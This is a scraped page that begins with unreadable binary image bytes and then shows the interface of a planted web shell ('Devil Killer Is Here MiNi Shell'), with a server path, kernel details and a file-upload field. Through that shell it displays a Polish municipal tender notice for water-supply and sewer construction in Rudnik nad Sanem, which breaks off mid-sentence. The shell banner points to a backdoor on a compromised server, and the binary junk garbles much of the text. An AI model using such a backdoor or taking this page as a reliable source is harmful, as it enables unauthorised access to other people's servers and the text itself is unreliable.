JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220325/0009914701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i rozbudowa sieci wodociągowej i kanalizacji sanitarnej na terenie Gminy i Miasta Rudnik nad Sanem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA I MIASTO RUDNIK NAD SANEM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409465</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 40</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rudnik nad Sanem</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158761002</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rudnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rudnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i rozbudowa sieci wodociągowej i kanalizacji sanitarnej na terenie Gminy i Miasta Rudnik nad Sanem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ee43570f-ac34-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00099147</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00026918/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa i rozbudowa sieci wodociągowej i kanalizacji sanitarnej na terenie Gminy i Miasta Rudnik nad Sanem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.rudnik.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl<br/>https://epuap.gov.pl/wps/portal<br/>przetargi@rudnik.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, z zastrzeżeniem, iż oferta musi zostać złożona przy użyciu miniPortalu.<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. Oferta powinna być sporządzona w języku polskim, z zachowaniem formy elektronicznej podpisana kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej w formacie danych *.doc, *docx,*pdf, i podpisem zaufanym<br/>lub podpisem osobistym. Sposób złożenia oferty, w tym zaszyfrowania (deszyfrowania) oferty opisany został w Regulaminie korzystania z miniPortal. Ofertę należy złożyć w oryginale.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o przetwarzaniu danych osobowych -§ 22 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o przetwarzaniu danych osobowych -§ 22 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPF.271.9.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1690457,47 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres przedmiotu zamówienia obejmuje wykonanie:<br/>1)	Zadanie 1 – Budowa sieci wodociągowej przy ul. Kościelnej:<br/>a)	wykonanie robót ziemnych, w tym m.in.:<br/>•	wykopy oraz przekopy na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe,<br/>•	umocnienie ścian wykopów,<br/>•	ręczne i mechaniczne zasypanie wykopów,<br/>•	mechaniczne zagęszczenie nasypów<br/>b)	wykonanie robót montażowych, w tym m.in.:<br/>•	montaż rurociągów z rur polietylenowych - ciśnieniowych PE, PEHD o średnicy zewnętrznej 110 mm połączonych metodą zgrzewania czołowego,<br/>•	montaż zasuw kołnierzowych, hydrantów pożarowych naziemnych, kształtek żeliwnych, ciśnieniowych, kołnierzowych PE, <br/>•	ręczne układanie mieszanki betonowej w konstrukcjach: ławy, bloki oporowe,<br/>•	przewierty maszyną do wierceń poziomych,<br/>•	oznakowanie trasy rurociągu,<br/>•	próba szczelności sieci wodociągowych.<br/>c)	wykonanie robót odtworzeniowych.<br/>2)	Zadanie 2 – Budowa sieci wodociągowej w Borowinie:<br/>a)	wykonanie robót ziemnych, w tym m.in.:<br/>•	wykopy oraz przekopy na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe lub jamiste,<br/>•	umocnienie i zasypywanie ścian wykopów,<br/>•	ręczne rozplantowanie ziemi,<br/>b)	wykonanie robót montażowych, w tym m.in.:<br/>•	montaż rur ciśnieniowych PE o średnicy 110 mm oraz 90 mm łączonych metodą zgrzewania,<br/>•	układanie mieszanki betonowej w konstrukcjach: ławy, bloki oporowe,<br/>•	montaż kształtek ciśnieniowych PE, PEHD o łączeniach zgrzewanych, tulei kołnierzowych,<br/>•	przewiert horyzontalny z rur dwuwarstwowych PE 100 SDR 17 o wymiarach 110x10 mm wraz z płozami i zabezpieczeniem końcówek rurociągu,<br/>•	montaż rur ochronnych (osłonowych), żeliwnych kształtek ciśnieniowych – kołnierzowych (kołnierze redukcyjne, trójnik), zasuw kołnierzowych z obudową oraz nadziemnych hydrantów pożarowych,<br/>•	oznakowanie trasy rurociągu,<br/>•	próba szczelności sieci wodociągowych,<br/>c)	wykonanie robót w zakresie napraw dróg, w tym m.in.:<br/>•	mechaniczne wykonanie koryta w gruncie,<br/>•	wywiezienie gruzu z rozbieranych konstrukcji,<br/>•	wykonanie nawierzchni żwirowej z kruszywa rozścielanego ręcznie.<br/>3)	Zadanie 3 – Rozbudowa wodociągu przy ul. Reymonta:<br/>a)	wykonanie robót ziemnych, w tym m.in.:<br/>•	wykopy oraz przekopy na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe lub jamiste,<br/>•	umocnienie ścian wykopów,<br/>•	zasypanie wykopów,<br/>•	rozplantowanie ziemi,<br/>b)	wykonanie robót montażowych, w tym m.in.:<br/>•	przyłącza wodociągowe z rur ciśnieniowych PE o średnicy 63 mm,<br/>•	połączenie rur polietylenowych – ciśnieniowych PE, PEHD metodą zgrzewania czołowego, <br/>•	przewiert horyzontalny z rur dwuwarstwowych PE 100 SDR 17 o wymiarach 110x10 mm wraz z płozami i zabezpieczeniem końcówek rurociągu,<br/>•	montaż rur ochronnych (osłonowych),<br/>•	montaż żeliwnych kształtek ciśnieniowych – kołnierzowych (kołnierze redukcyjne, trójnik) i tulei kołnierzowych,<br/>•	oznakowanie trasy rurociągu,<br/>•	próba szczelności sieci wodociągowych.<br/>4)	Zadanie 4 – Rozbudowa wodociągu przy ul. Akacjowej:<br/>a)	wykonanie robót ziemnych, w tym m.in.:<br/>•	wykopy oraz przekopy wykonywane na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe lub jamiste,<br/>•	umocnienie ścian wykopów,<br/>•	zasypanie wykopów,<br/>•	humusowanie i obsianie skarp.<br/>b)	wykonanie robót montażowych, w tym m.in.:<br/>•	montaż trójnika kołnierzowego, zasuwy kołnierzowej typu „E” z obudową o średnicy do 150 mm na rurociągach PVC i PE,<br/>•	montaż rurociągów z rur polietylenowych PE i PEHD) o średnicy zewnętrznej 110 mm,<br/>•	montaż rur ciśnieniowych PE o średnicy 110 mm oraz 90 mm łączonych metodą zgrzewania,<br/>•	montaż kształtek ciśnieniowych PE, PEHD – tuleja kołnierzowa, nadziemnych hydrantów pożarowych, zasuw żeliwnych z obudową na rurociągach PVC i PE oraz rur ochronnych (osłonowych), <br/>•	wykonanie przyłączy wodociągowych z rur ciśnieniowych,<br/>•	przewiert horyzontalny z rur dwuwarstwowych wraz z płozami i zabezpieczeniem końcówek rurociągu,<br/>•	oznakowanie trasy rurociągu,<br/>•	próba szczelności sieci wodociągowych.<br/>5)	Zadanie 5 - Rozbudowa kanalizacji przy ul. Pułaskiego:<br/>a)	wykonanie robót ziemnych i przygotowawczych – kanały grawitacyjne DN200, w tym m.in.:<br/>•	wykopy oraz przekopy na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe pod fundamenty, rurociągi i kolektory,<br/>•	umocnienie ścian wykopów,<br/>•	zasypanie wykopów,<br/>•	zagęszczenie nasypów,<br/>•	inwentaryzacja powykonawcza,<br/>b)	wykonanie robót ziemnych i przygotowawczych –przewód tłoczny DN63, w tym m.in.:<br/>•	wytyczenie trasy kanalizacji sanitarnej o śr. 63 mm,<br/>•	wykopy oraz przekopy na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe pod fundamenty, rurociągi i kolektory,<br/>•	umocnienie i zasypywanie ścian wykopów,<br/>•	inwentaryzacja powykonawcza,<br/>c)	wykonanie robót ziemnych i przygotowawczych –pompownia ścieków, w tym m.in.:<br/>•	wykopy jamiste na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe z ręcznym wydobyciem urobku w gruntach suchych,,<br/>•	umocnienie i zasypanie ścian wykopów,<br/>•	zagęszczenie nasypów,<br/>d)	wykonanie robót montażowych – kanały grawitacyjne DN200, w tym m.in.:<br/>•	montaż kanałów z rur typu PVC łączone na wcisk o średnicy 200 mm oraz studzienek kanalizacyjnych systemowych o średnicy 400 mm,<br/>•	próba szczelności kanałów rurowych,<br/>e)	wykonanie robót montażowych – przewód tłoczny DN63, w tym m.in.:<br/>•	montaż rurociągów z rur polietylenowych – PE, PEHD o średnicy 63 mm oraz kształtek PE na rurociągach o średnicy 110 i 63 mm,<br/>•	deskowanie ścian prostych, bloków oporowych o wys. do 3 m,<br/>•	układanie mieszanki betonowej w konstrukcjach - ławy fundamentowe, bloki<br/>oporowe.<br/>•	próba szczelności kanałów rurowych,<br/>f)	wykonanie robót montażowych- pompownia ścieków P1, <br/>g)	wykonanie ogrodzenia pompowni P1, w tym m.in.:<br/>•	montaż cokołów z fundamentami,<br/>•	wykonanie ogrodzenia o wys. ok 1,5 m wraz z bramą,<br/>h)	wykonanie placu przepompowni ścieków P1, w tym m.in.:<br/>•	ręczne usuniecie warstwy ziemi urodzajnej,<br/>•	mechaniczne wykonanie koryta na całej szerokości jezdni i chodników na głębokość 20 cm,<br/>•	profilowanie i zagęszczenie podłoża,<br/>•	wykonanie warstw odsączających oraz podbudowy z kruszyw – tłuczeń,<br/>•	wykonanie nawierzchni z kostki brukowej o grubości 8 cm oraz krawężników betonowych o wymiarach 15x30 cm,<br/>i)	wykonanie przewiertu sterowanego pod drogą.<br/>6)	Zadanie 6 – Rozbudowa wodociągu przy ul. Pułaskiego:<br/>a)	wykonanie robót ziemnych i przygotowawczych – przewód wodociągowy, w tym m.in.:<br/>•	wytyczenie trasy,<br/>•	wykopy oraz przekopy na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe pod fundamenty, rurociągi i kolektory,<br/>•	umocnienie i zasypanie ścian wykopów,<br/>•	zagęszczenie nasypów,<br/>•	inwentaryzacja powykonawcza,<br/>b)	wykonanie robót montażowych – sieć wodociągowa, w tym m.in.:<br/>•	montaż trójników kołnierzowych, zasuwy kołnierzowej z obudową montowana na rurociągach PVC i PE, rurociągów z rur polietylenowych, montaż kształtek PE na rurociągach PE, zasuw żeliwnych z obudową na rurociągach PVC i PE oraz rur ochronnych – osłonowych typu PE,<br/>•	połączenie rur polietylenowych, ciśnieniowych PE, PEHD metoda zgrzewania<br/>czołowego,<br/>•	połączenie rur polietylenowych, ciśnieniowych za pomocą kształtek elektrooporowych,<br/>•	wykonanie przyłączy wodociągowych z rur ciśnieniowych PE,<br/>•	próba szczelności sieci wodociągowej,<br/>•	oznakowanie trasy rurociągu tabliczkami na słupku betonowym,<br/>•	deskowanie ścian prostych, bloków oporowych o wys. do 3 m,<br/>•	układanie mieszanki betonowej w konstrukcjach - ławy fundamentowe, bloki<br/>oporowe.<br/>c)	wykonanie przewiertu sterowanego pod drogą.<br/>7)	Zadanie 7 - Rozbudowa kanalizacji przy ul. Leśnej:<br/>a)	wykonanie robót ziemnych i przygotowawczych – kanały grawitacyjne DN160, DN200 i kanał tłoczny DN90, w tym m.in.:<br/>•	wytyczenie trasy kanalizacji sanitarnej o średnicy 90, 160 mm i 200 mm,<br/>•	wykopy oraz przekopy na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe pod fundamenty, rurociągi i kolektory,<br/>•	umocnienie ścian wykopów,<br/>•	zasypanie wykopów,<br/>•	inwentaryzacja powykonawcza,<br/>b)	wykonanie robót ziemnych i przygotowawczych –pompownia ścieków, w tym m.in.:<br/>•	wykopy jamiste na odkład koparkami podsiębiernymi,<br/>•	wykopy liniowe z ręcznym wydobyciem urobku w gruntach suchych,,<br/>•	umocnienie ścian wykopów,<br/>•	wykonanie podłoża pod kanały i obiekty z materia łów sypkich – podsypka o grubości ok. 10 cm i obsypka o grubości ok. 10 cm,<br/>•	zasypanie wykopów,<br/>•	zagęszczenie nasypów,<br/>c)	wykonanie odwodnienia wykopów,<br/>d)	wykonanie robót montażowych – kanały grawitacyjne DN160, DN200 i kanał tłoczny DN90, w tym m.in.:<br/>•	montaż kanałów z rur typu PVC łączone na wcisk o średnicy 90, 160 i 200 mm,<br/>•	montaż studzienek kanalizacyjnych systemowych o średnicy 400 mm oraz 1000 mm,<br/>•	zabezpieczenie istniejących kabli energetycznych,<br/>•	próba szczelności kanałów rurowych,<br/>e)	wykonanie placu przepompowni ścieków P1, w tym m.in.:<br/>•	ręczne usuniecie warstwy ziemi urodzajnej,<br/>•	mechaniczne wykonanie koryta na całej szerokości jezdni i chodników na głębokość 20 cm,<br/>•	profilowanie i zagęszczenie podłoża,<br/>•	wykonanie warstw odsączających oraz podbudowy z kruszyw – tłuczeń,<br/>•	wykonanie nawierzchni z kostki brukowej o grubości 8 cm oraz krawężników betonowych o wymiarach 15x30 cm,<br/>f)	wykonanie rozdzielnicy „SZP” wraz z instalacją WLZ, w tym m.in.:<br/>•	ręczne kopanie rowów dla kabli,<br/>•	ułożenie rur osłonowych PVC o średnicy 140 mm,<br/>•	ręczne układanie kabli w rowach kablowych,<br/>•	mechaniczne pogrążenie uziomów pionowych prętowych,<br/>•	wykonanie poziomych uziomów powierzchniowych,<br/>•	montaż kompletnej rozdzielnicy, aparatury modułowej, zabezpieczającej i sterującej,<br/>•	montaż i stawianie słupów oświetleniowych<br/>•	montaż opraw oświetlenia zewnętrznego na słupie – LED,<br/>g)	wykonanie robót odtworzeniowych pod drogą asfaltową, w tym m.in.:<br/>•	przewiert sterowany pod drogą gminną w rurach trójwarstwowych,<br/>•	roboty ziemne wykonywane koparkami podsiębiernymi,<br/>•	wykonanie podbudowy z kruszyw – tłuczeń,<br/>•	skropienie nawierzchni drogowej asfaltem,<br/>•	wykonanie z mieszanek mineralno – bitumicznych.<br/>h)	wykonanie robót odtworzeniowych pod drogą gruntową, w tym m.in.:<br/>•	roboty ziemne wykonywane koparkami podsiębiernymi,<br/>•	wykonanie podbudowy z kruszyw – tłuczeń,<br/>•	profilowanie i zagęszczenie podłoża. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-03</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1) Kryterium: Cena - waga 60%<br/>2) Kryterium: Gwarancja –waga 40%. <br/>Kryteria oceny ofert – stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium. Po dokonaniu oceny oferty, punkty zostaną zsumowane. Tak uzyskana ocena za kryteria stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu dotyczą:<br/>1)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. <br/>2)	sytuacji ekonomicznej lub finansowej. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. <br/>3)	zdolności technicznej lub zawodowej. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie i uzna, że warunek ten zostanie spełniony, jeżeli Wykonawca oświadczy, że posiada zdolności techniczne i zawodowe pozwalające na prawidłową realizację zamówienia oraz wykaże, że:<br/>a)	wykonał należycie, zgodnie z przepisami prawa budowlanego i zgodnie z zasadami sztuki budowlanej oraz prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie, 2 roboty budowlane (dotyczące budowy lub rozbudowy sieci wodociągowej lub kanalizacji sanitarnej) odpowiadające swoim rodzajem i wartością nie mniejszą niż 1 500 000,00 